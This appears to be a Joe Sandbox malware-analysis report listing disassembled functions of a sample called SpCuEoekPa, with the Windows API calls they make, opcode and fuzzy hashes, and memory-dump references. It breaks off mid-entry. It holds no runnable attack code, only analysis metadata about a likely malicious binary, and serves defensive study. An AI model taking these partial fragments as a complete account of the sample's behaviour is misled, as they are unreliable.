                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2267087916-0
                                                            • Opcode ID: 9fc40e69e62bd2551219e72b4c633200e01c63d7d3e43ff7a02fba8ff07a7380
                                                            • Instruction ID: 60d69606e79a169f1abfac810804f0a83c0e09875a0af3e556ee4dd94dae4ce1
                                                            • Opcode Fuzzy Hash: 9fc40e69e62bd2551219e72b4c633200e01c63d7d3e43ff7a02fba8ff07a7380
                                                            • Instruction Fuzzy Hash: 4421A3795082019FC311EF28C881DAA77E8EE59364F108A2DF4D9CB2E1D771DE55CB82
                                                            Function 003BDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 003BF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,003BDCD3,?,?,?,003BEAC6,00000000,000000EF,00000119,?,?), ref: 003BF0CB
                                                              • Part of subcall function 003BF0BC: lstrcpyW.KERNEL32(00000000,?,?,003BDCD3,?,?,?,003BEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003BF0F1
                                                              • Part of subcall function 003BF0BC: lstrcmpiW.KERNEL32(00000000,?,003BDCD3,?,?,?,003BEAC6,00000000,000000EF,00000119,?,?), ref: 003BF122
                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,003BEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003BDCEC
                                                            • lstrcpyW.KERNEL32(00000000,?,?,003BEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003BDD12
                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,003BEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003BDD46
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen
                                                            • String ID: cdecl
                                                            • API String ID: 4031866154-3896280584
                                                            • Opcode ID: 7fd5b891819c4f5879ec68c85cc6fd8d19b8cf7c5ea2fe948a115fe6234f40cf
                                                            • Instruction ID: 81fb0fb4bd7a86e2e68f1ab0a29e5187f93446291d6ef546cda275661c3279e1
                                                            • Opcode Fuzzy Hash: 7fd5b891819c4f5879ec68c85cc6fd8d19b8cf7c5ea2fe948a115fe6234f40cf
                                                            • Instruction Fuzzy Hash: FB11B13A200305EFCB26AF34CC459BA77A8FF45314B40816AFA46CB6A0FB719840C794
                                                            Function 003950E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00395101
                                                              • Part of subcall function 0038571C: __FF_MSGBANNER.LIBCMT ref: 00385733
                                                              • Part of subcall function 0038571C: __NMSG_WRITE.LIBCMT ref: 0038573A
                                                              • Part of subcall function 0038571C: RtlAllocateHeap.NTDLL(01630000,00000000,00000001,00000000,?,?,?,00380DD3,?), ref: 0038575F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 82d3fba494ca5c189a563089757c8e23bb8592f6273c0b75861cf286e86e36e1
                                                            • Instruction ID: 58b545ada0af4e5d04efcfa53454f37c530f43f5bbe2b7c1e68cb7d51261dcb5
                                                            • Opcode Fuzzy Hash: 82d3fba494ca5c189a563089757c8e23bb8592f6273c0b75861cf286e86e36e1
                                                            • Instruction Fuzzy Hash: 3311A072A00B15AFCF333F74AC4575E3B989B543A1F21496AF9449E290DF74C9C18790
                                                            Function 003644A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 003644CF
                                                              • Part of subcall function 0036407C: _memset.LIBCMT ref: 003640FC
                                                              • Part of subcall function 0036407C: _wcscpy.LIBCMT ref: 00364150
                                                              • Part of subcall function 0036407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00364160
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00364524
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00364533
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0039D4B9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                            • String ID:
                                                            • API String ID: 1378193009-0
                                                            • Opcode ID: 29f6c9934b97cbdeee32ce41991d4abac0794c391274faabd15cc50227228fa6
                                                            • Instruction ID: 2a7467fb96c510b4d12e7aa21bf7577e624b485726297da926add9d9a2417aa1
                                                            • Opcode Fuzzy Hash: 29f6c9934b97cbdeee32ce41991d4abac0794c391274faabd15cc50227228fa6
                                                            • Instruction Fuzzy Hash: A12107709047849FEB338B25984ABE7BBEC9F02314F04409DE79E5B181C7742A84CB51
                                                            Function 003D6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003C7896,?,?,00000000), ref: 00365A2C
                                                              • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003C7896,?,?,00000000,?,?), ref: 00365A50
                                                            • gethostbyname.WSOCK32(?,?,?), ref: 003D6399
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D63A4
                                                            • _memmove.LIBCMT ref: 003D63D1
                                                            • inet_ntoa.WSOCK32(?), ref: 003D63DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 1504782959-0
                                                            • Opcode ID: d7bae89d0e52483d7b585d7da9cb865be788cf0e5fd49cbb6b9f86b80d30822a
                                                            • Instruction ID: 1f094e983a96c8ef84b1e4ae9e5032c27f16d4359a5b9ba6721e387bbeb1f0fe
                                                            • Opcode Fuzzy Hash: d7bae89d0e52483d7b585d7da9cb865be788cf0e5fd49cbb6b9f86b80d30822a
                                                            • Instruction Fuzzy Hash: 88116372500109AFCB16FBA4DD86DEE77BCAF08310B148176F505EB2A1DB30AE14CB61
                                                            Function 003B8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 003B8B61
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003B8B73
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003B8B89
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003B8BA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 69c3e380c528f19fdfd701c53ee466847ab6e0dfaa7967b3fd957d501c15e749
                                                            • Instruction ID: c60d3d8697f958c287a2759482cb4991112a3e90c575011972b70797977314f3
                                                            • Opcode Fuzzy Hash: 69c3e380c528f19fdfd701c53ee466847ab6e0dfaa7967b3fd957d501c15e749
                                                            • Instruction Fuzzy Hash: 37110A79901218FFDB11DBA5C885EDDBB78EB48710F204195EA00B7290DA716E11DB94
                                                            Function 00361290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 003612D8
                                                            • GetClientRect.USER32(?,?), ref: 0039B5FB
                                                            • GetCursorPos.USER32(?), ref: 0039B605
                                                            • ScreenToClient.USER32(?,?), ref: 0039B610
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            • Opcode ID: 9bb906280c07b666f6ea768927964fbdcca49e53c2b5554c0130e95997b20a9b
                                                            • Instruction ID: cd058ac25bc09e7554dac1677ee68160d9a411963ddd3b00943bda8b0d21a763
                                                            • Opcode Fuzzy Hash: 9bb906280c07b666f6ea768927964fbdcca49e53c2b5554c0130e95997b20a9b
                                                            • Instruction Fuzzy Hash: 36114F35600459EFCF12EF98D8959FE77B8FB06300F408955F941EB180C770BA518BA5
                                                            Function 003BD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003BD84D
                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003BD864
                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003BD879
                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003BD897
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                            • String ID:
                                                            • API String ID: 1352324309-0
                                                            • Opcode ID: 2b15aa868698b9806fe4fd11dafd723f167f0826b9dadf68708ff6d6f0ce7562
                                                            • Instruction ID: 09477abdc93150647722cba2f2bb71758a97f2d3676be8414340c53e9f0f53f4
                                                            • Opcode Fuzzy Hash: 2b15aa868698b9806fe4fd11dafd723f167f0826b9dadf68708ff6d6f0ce7562
                                                            • Instruction Fuzzy Hash: 70115E75605704DFE3218F51DC48F92BBBCEB00B05F108569A616D6890E7B1E5499FA1
                                                            Function 00396FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction ID: c652ac84ad067a4a66f08cb5b8fbda01b031fcf7b2a87d3ac497c63b4f4275e5
                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction Fuzzy Hash: 42014C7245914ABBCF175F84CC42CEE3F66BB18350F598415FE18581B1D236C9B1AB81
                                                            Function 003EB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 003EB2E4
                                                            • ScreenToClient.USER32(?,?), ref: 003EB2FC
                                                            • ScreenToClient.USER32(?,?), ref: 003EB320
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 003EB33B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: edc81e27cd0057cff6901f7a44cffd0cbcd2d9748e4eae9688e981afcebf3e4d
                                                            • Instruction ID: 76e46f260a7c56d6ab5b8888768e2feeabcfe4faba8b6803008ec09125475590
                                                            • Opcode Fuzzy Hash: edc81e27cd0057cff6901f7a44cffd0cbcd2d9748e4eae9688e981afcebf3e4d
                                                            • Instruction Fuzzy Hash: A11143B9D00249EFDB51CFA9D8849EEFBB9FB08310F108166E914E3260D775AA558F50
                                                            Function 003C6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 003C6BE6
                                                              • Part of subcall function 003C76C4: _memset.LIBCMT ref: 003C76F9
                                                            • _memmove.LIBCMT ref: 003C6C09
                                                            • _memset.LIBCMT ref: 003C6C16
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 003C6C26
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                            • String ID:
                                                            • API String ID: 48991266-0
                                                            • Opcode ID: c18d7b1a294ef5e207a0abb8fde0580d7ac0ff7e75ec1469441112cfaaf64dd1
                                                            • Instruction ID: 5eb219b98a38f61203f4fcaa3fa06c0c142fc896cc23b4bae77101fb931482fb
                                                            • Opcode Fuzzy Hash: c18d7b1a294ef5e207a0abb8fde0580d7ac0ff7e75ec1469441112cfaaf64dd1
                                                            • Instruction Fuzzy Hash: C3F05E3A200204ABCF026F55DC85E8ABF29EF45320F04C0A5FE089E267D771E911CBB4
                                                            Function 00362218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 00362231
                                                            • SetTextColor.GDI32(?,000000FF), ref: 0036223B
                                                            • SetBkMode.GDI32(?,00000001), ref: 00362250
                                                            • GetStockObject.GDI32(00000005), ref: 00362258
                                                            • GetWindowDC.USER32(?,00000000), ref: 0039BE83
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0039BE90
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0039BEA9
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0039BEC2
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0039BEE2
                                                            • ReleaseDC.USER32(?,00000000), ref: 0039BEED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1946975507-0
                                                            • Opcode ID: 17b4ae16c5f67fc08baabcbe3dc77ac84299d80f2e30f8c5f232ea9036d9939b
                                                            • Instruction ID: a3e97541c687a5ac1743140fc49feb3c6f4710e6a2fb765b24eb380c4af83279
                                                            • Opcode Fuzzy Hash: 17b4ae16c5f67fc08baabcbe3dc77ac84299d80f2e30f8c5f232ea9036d9939b
                                                            • Instruction Fuzzy Hash: 11E03031504184AEEF225F64FC4D7D87B19EB15332F018366FA69480E187B14580DB11
                                                            Function 003B8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 003B871B
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,003B82E6), ref: 003B8722
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003B82E6), ref: 003B872F
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,003B82E6), ref: 003B8736
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: bbd4bd74cf3b9b840c485c0be1d4eaf17f206b6b4bcbd8220d6409bae523b80f
                                                            • Instruction ID: 5bc798ad9a2b688d7f1a1b3e5f02055bd6ba51b1dade7969f20c33904ee34579
                                                            • Opcode Fuzzy Hash: bbd4bd74cf3b9b840c485c0be1d4eaf17f206b6b4bcbd8220d6409bae523b80f
                                                            • Instruction Fuzzy Hash: DCE086366122529FD7315FB0AD4DB963BACEF90795F158828B385CD0C0DA749841C750
                                                            Function 00366240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %?
                                                            • API String ID: 0-3131337030
                                                            • Opcode ID: 509ff7deb79b1c01381952891d58e889d642fec567af6c97b7a358fc7bea2a92
                                                            • Instruction ID: 2994db34890fd90290f9627f9541a729eed95920c4cdc959f6d197a80e213c01
                                                            • Opcode Fuzzy Hash: 509ff7deb79b1c01381952891d58e889d642fec567af6c97b7a358fc7bea2a92
                                                            • Instruction Fuzzy Hash: 89B1D4758001099BCF17EF94C8969FEBBB8FF44394F50C126E502AB299DB309E85CB95
                                                            Function 003DAEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __itow_s
                                                            • String ID: xbB$xbB
                                                            • API String ID: 3653519197-2672806994
                                                            • Opcode ID: 68078a8303f6706dcede5d41ab812c996ef0763df50a2573e45af330e8b86868
                                                            • Instruction ID: b2f04057feac0911b7a626e9fc6a8de2837c46baaf81b539e4fbf16c7b32a171
                                                            • Opcode Fuzzy Hash: 68078a8303f6706dcede5d41ab812c996ef0763df50a2573e45af330e8b86868
                                                            • Instruction Fuzzy Hash: 69B17E72A00109EFCB16EF54D891EBABBB9FF59300F15805AF9459B392EB70D941CB60
                                                            Function 003CAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • __wcsnicmp.LIBCMT ref: 003CB02D
                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 003CB0F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
